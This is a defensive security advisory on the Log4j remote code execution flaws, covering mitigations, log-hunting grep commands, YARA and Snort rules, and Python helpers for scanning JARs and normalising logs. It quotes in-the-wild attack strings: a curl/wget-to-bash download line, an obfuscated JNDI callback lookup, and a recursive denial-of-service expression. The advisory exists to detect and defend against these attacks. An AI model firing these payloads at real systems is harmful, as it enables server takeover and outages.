Log4j — how to protect your systems (CVE-2021-44228)
During the first weeks of December 2021 we observed attacks targeting the Apache Log4j library. On 2021-12-12, an official security advisory disclosed a critical Remote Command Execution vulnerability — CVE-2021-44228 (T1190 — Exploit Public-Facing Application).
Any vulnerable system exposed to the public network is to be considered compromised given the volume of mass-exploitation activity observed worldwide — confidence high.
The Apache Software Foundation has released an emergency security update patching the 0-day; the fixed version is 2.15.0.
Concurrent with the disclosure of CVE-2021-44228 (Log4j 2), a similar vulnerability was identified in the 1.x branch of the same product, affecting configurations that use the JMSAppender class. This vulnerability — CVE-2021-4104 — does not depend on user-controlled input but on the deployed configuration.
Update — 2021-12-20
New Log4j vulnerabilities have been identified in version 2.15.0 (CVE-2021-45046) and 2.16.0 (CVE-2021-45105) — both shipped as patches for the originally vulnerable 2.14.0. The recommended action is to upgrade directly to 2.17.0, which addresses the security issues observed in the previous releases.
CVE-2021-45046
The patch for CVE-2021-44228 proved incomplete in non-default configurations. When the logging configuration uses a non-default Pattern Layout containing a Context Lookup (e.g. $${ctx:loginId}), an attacker controlling Thread Context Map (MDC) input can supply a crafted JNDI Lookup pattern, causing — in some operating environments — information leakage and remote code execution, and in all environments local code execution.
Apache addresses this vulnerability in Log4j 2.16.0.
CVE-2021-45105
Log4j versions from 2.0-alpha1 through 2.16.0 (excluding 2.12.3) do not protect against uncontrolled recursion in self-referential lookups. An attacker controlling Thread Context Map data can trigger a Denial of Service (DoS) by injecting a crafted recursive expression — for example: ${${::-${::-$${::-j}}}}
Apache addresses this vulnerability in Log4j 2.17.0.

Detection and Risk Mitigation
Source countries of scanning activity
Below is an overview of the source IP addresses we observed driving exploitation:

Vulnerability and Attack Details
The technical details required to identify, analyse, and mitigate the compromise risk are documented below — closing the exposure window across heterogeneous Java estates is the kind of structured patch and posture programme delivered by our Cybersecurity Advisory.
Affected Applications
A large set of Java-based applications are vulnerable, including:
- Elastic Search
- Elastic LogStash
- GrayLog2
- Minecraft (client and server)
- Neo4J
- Apache projects (Druid, Dubbo, Flink, Flume, Hadoop, Kafka, Solr, Spark, Struts, Tapestry, Wicket)
- VMware products (Horizon, vCenter, vRealize, HCX, NSX-T, UAG, Tanzu)
- Grails
- Custom Java products
- Redis
- Video games (e.g. Minecraft)
Vulnerability Details
All Apache Log4j2 versions up to 2.14.1 expose Java Naming and Directory Interface (JNDI) lookups. These lookups — usable in configuration, log messages, and parameters — do not guard against LDAP and JNDI endpoints controlled by malicious actors. As a result, an attacker who can influence log messages or their parameters can execute arbitrary code fetched from an LDAP server whenever Message Lookup Substitution is enabled.
To exploit the vulnerability, attackers can send an HTTP request carrying a specially crafted string that generates a Log4j log entry whose content is then resolved into a JNDI (Java Naming and Directory Interface) request to an attacker-controlled server.
Processing of the malicious server’s response on the vulnerable system executes the code that the attacker has crafted and injected.
How to mitigate the threat
From Log4j 2.15.0 onwards, message lookup substitution is disabled by default, which makes upgrading the simplest and most effective fix.
Other possible mitigations include:
- In earlier versions, up to 2.10, this threat can be mitigated by setting the following system property or environment variable:
  - log4j2.formatMsgNoLookups=true (JVM system property)
  - LOG4J_FORMAT_MSG_NO_LOOKUPS=true (environment variable)
- In versions prior to 2.10, it can be mitigated by removing the JndiLookup class from the classpath:
  - zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
- On Java 8u121, set:
  - com.sun.jndi.rmi.object.trustURLCodebase=false
  - com.sun.jndi.cosnaming.object.trustURLCodebase=false
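As an added example (not the advisory's own tooling), this Python script checks a log4j-core JAR against the two conditions above: the shipped version versus 2.17.0, and whether JndiLookup.class has been stripped. The sample JAR it builds is constructed in memory; run scan_jar() on real files from your own hosts.

```python
# Added example (not the advisory's own code): inventory log4j-core JARs and
# report which ones still need the upgrade or the JndiLookup removal above.
# The JAR built by build_sample_jar() is constructed in memory for the demo.
import io
import re
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED = (2, 17, 0)   # 2.17.0 on the 2.x line; 2.3.x/2.12.x backports not handled


def parse_version(text):
    """Turn the 'version=2.14.1' line of pom.properties into a tuple."""
    m = re.search(r"^version=(\d+)\.(\d+)\.(\d+)", text, re.M)
    return tuple(int(x) for x in m.groups()) if m else None


def assess(names, version):
    """Classify one JAR from its entry names and log4j-core version."""
    if version is None:
        return "unknown (no log4j-core pom.properties)"
    if version >= FIXED:
        return "fixed"
    if JNDI_CLASS not in names:
        return "mitigated (JndiLookup.class removed; still upgrade to 2.17.0)"
    return "VULNERABLE (upgrade to 2.17.0)"


def scan_jar(path_or_fileobj):
    """Open a JAR (path or file object) and assess it without executing it."""
    with zipfile.ZipFile(path_or_fileobj) as jar:
        names = set(jar.namelist())
        version = None
        if POM_PROPS in names:
            version = parse_version(jar.read(POM_PROPS).decode("utf-8", "replace"))
    return assess(names, version)


def build_sample_jar(version, keep_jndi_class=True):
    """Constructed sample: a minimal log4j-core-like JAR held in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\nversion=%s\n" % version)
        if keep_jndi_class:
            jar.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    buf.seek(0)
    return buf
```

Nested JARs (a log4j-core inside a WAR or uber-JAR) are not unpacked here; feed those inner archives to scan_jar() separately.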
Information on ongoing attacks
- The JNDI lookup is used to fetch the malicious Java object via a specific protocol (dns, ldap, etc.):

- All requests carry the malicious payload (often in the User-Agent or Referer header)
- Most payloads are Base64-encoded:
(curl -s <malicious IP>:<Port>/<victim IP>:<victim Port>||wget -q -O- <malicious IP>:<Port>/<victim IP>:<victim Port>)|bash
Observed URIs
| URI (useful for detection) |
|---|
| /Basic/Command/Base64/<Base64Code> |
| /a |
| /callback |
| /Exploit |
| /epepap |
| /b |
Obfuscation methods
- ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}
Attacker IPs
Attack identification
From application logs
sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+'
sudo find /var/log/ -type f -exec sh -c "cat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -I -i 'jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):'" \;
sudo find /var/log/ -name '*.gz' -type f -exec sh -c "zcat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):'" \;
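As an added example, not part of this advisory, the following Python normaliser undoes the lookup obfuscation listed under "Obfuscation methods" (${lower:x}, ${upper:x}, ${key:-default} chains, URL encoding) before applying the same scheme list the grep commands above use, so that a crude sed/grep pass is not bypassed; the log lines and host names it is run on are constructed placeholders.

```python
# Added example (not from the advisory): undo the lookup obfuscation shown above
# (${lower:x}, ${upper:x}, ${key:-default}, URL encoding) before matching.
# Sample lines and host names used with it are constructed placeholders.
import re
from urllib.parse import unquote

# Innermost ${...}: body holds no further "${" (a lone "$" is allowed).
INNER = re.compile(r"\$\{((?:[^${}]|\$(?!\{))*)\}")
# Schemes listed in the advisory's grep commands.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|nis|iiop|corba|nds|http)\s*:", re.I)


def _resolve(m):
    body = m.group(1)
    low = body.lower()
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if low.startswith("jndi:"):
        return m.group(0)            # keep the interesting part intact
    if ":-" in body:                 # ${::-j} / ${env:X:-j} -> default value
        return body.split(":-", 1)[1]
    return m.group(0)                # other lookups (ctx, sys, ...) untouched


def normalise(line, max_rounds=50):
    """URL-decode (twice, for double encoding), then peel lookups inside-out."""
    text = unquote(unquote(line))
    for _ in range(max_rounds):
        new = INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def nesting_depth(line):
    """Max ${...} nesting depth; long chains are the CVE-2021-45105 pattern."""
    depth = best = 0
    for tok in re.findall(r"\$\{|\}", line):
        if tok == "${":
            depth += 1
            best = max(best, depth)
        elif depth:
            depth -= 1
    return best


def inspect(line):
    norm = normalise(line)
    m = JNDI.search(norm)
    return {"jndi": bool(m), "scheme": m.group(1).lower() if m else None,
            "depth": nesting_depth(unquote(line)), "normalised": norm}
```

Feed each access-log line to inspect(); a jndi hit after normalisation, or a nesting depth well above what your own configuration ever produces, is the signal to escalate.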
YARA
rule EXPL_Log4j_CVE_2021_44228_Dec21_Soft {
   meta:
      description = "Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
      date = "2021-12-10"
      score = 70
   strings:
      $x1 = "${jndi:ldap:/"
      $x2 = "${jndi:rmi:/"
      $x3 = "${jndi:ldaps:/"
      $x4 = "${jndi:dns:/"
   condition:
      1 of them
}

rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard {
   meta:
      description = "Detects indicators in server logs that indicate the exploitation of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
      date = "2021-12-10"
      score = 80
   strings:
      $x1 = /\$\{jndi:(ldap|ldaps|rmi|dns):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/
      $fp1r = /(ldap|rmi|ldaps|dns):\/[\/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)/
   condition:
      $x1 and not 1 of ($fp*)
}

rule SUSP_Base64_Encoded_Exploit_Indicators_Dec21 {
   meta:
      description = "Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/Reelix/status/1469327487243071493"
      date = "2021-12-10"
      score = 70
   strings:
      /* curl -s */
      $sa1 = "Y3VybCAtcy"
      $sa2 = "N1cmwgLXMg"
      $sa3 = "jdXJsIC1zI"
      /* |wget -q -O- */
      $sb1 = "fHdnZXQgLXEgLU8tI"
      $sb2 = "x3Z2V0IC1xIC1PLS"
      $sb3 = "8d2dldCAtcSAtTy0g"
   condition:
      1 of ($sa*) and 1 of ($sb*)
}

rule SUSP_JDNIExploit_Indicators_Dec21 {
   meta:
      description = "Detects indicators of JDNI usage in log files and other payloads"
      author = "Florian Roth"
      reference = "https://github.com/flypig5211/JNDIExploit"
      date = "2021-12-10"
      score = 70
   strings:
      $xr1 = /ldap:\/\/[a-zA-Z0-9\.]{7,80}:[0-9]{2,5}\/(Basic\/Command\/Base64|Basic\/ReverseShell|Basic\/TomcatMemshell|Basic\/JBossMemshell|Basic\/WebsphereMemshell|Basic\/SpringMemshell|Basic\/Command|Deserialization\/CommonsCollectionsK|Deserialization\/CommonsBeanutils|Deserialization\/Jre8u20\/TomcatMemshell|Deserialization\/CVE_2020_2555\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)\//
   condition:
      filesize < 100MB and $xr1
}

rule SUSP_EXPL_OBFUSC_Dec21_1 {
   meta:
      description = "Detects obfuscation methods used to evade detection in log4j exploitation attempt of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/testanull/status/1469549425521348609"
      date = "2021-12-11"
      score = 60
   strings:
      /* ${lower:X} - single character match */
      $ = { 24 7B 6C 6F 77 65 72 3A ?? 7D }
      /* ${upper:X} - single character match */
      $ = { 24 7B 75 70 70 65 72 3A ?? 7D }
      /* URL encoded lower - obfuscation in URL */
      $ = "$%7blower:"
      $ = "$%7bupper:"
      $ = "%24%7bjndi:"
      $ = "/$%7bjndi:"
   condition:
      1 of them
}
Intrusion Detection: Snort/Suricata
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034647; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034648; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034649; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034650; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034652; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034651; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034653; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034654; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034655; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034656; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034657; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034658; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
ATTACK PAYLOAD
https://gist.github.com/nathanqthai/01808c569903f41a52e7e7b575caa890
C2 DOMAIN NAME
https://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8
ATTACK IP
https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217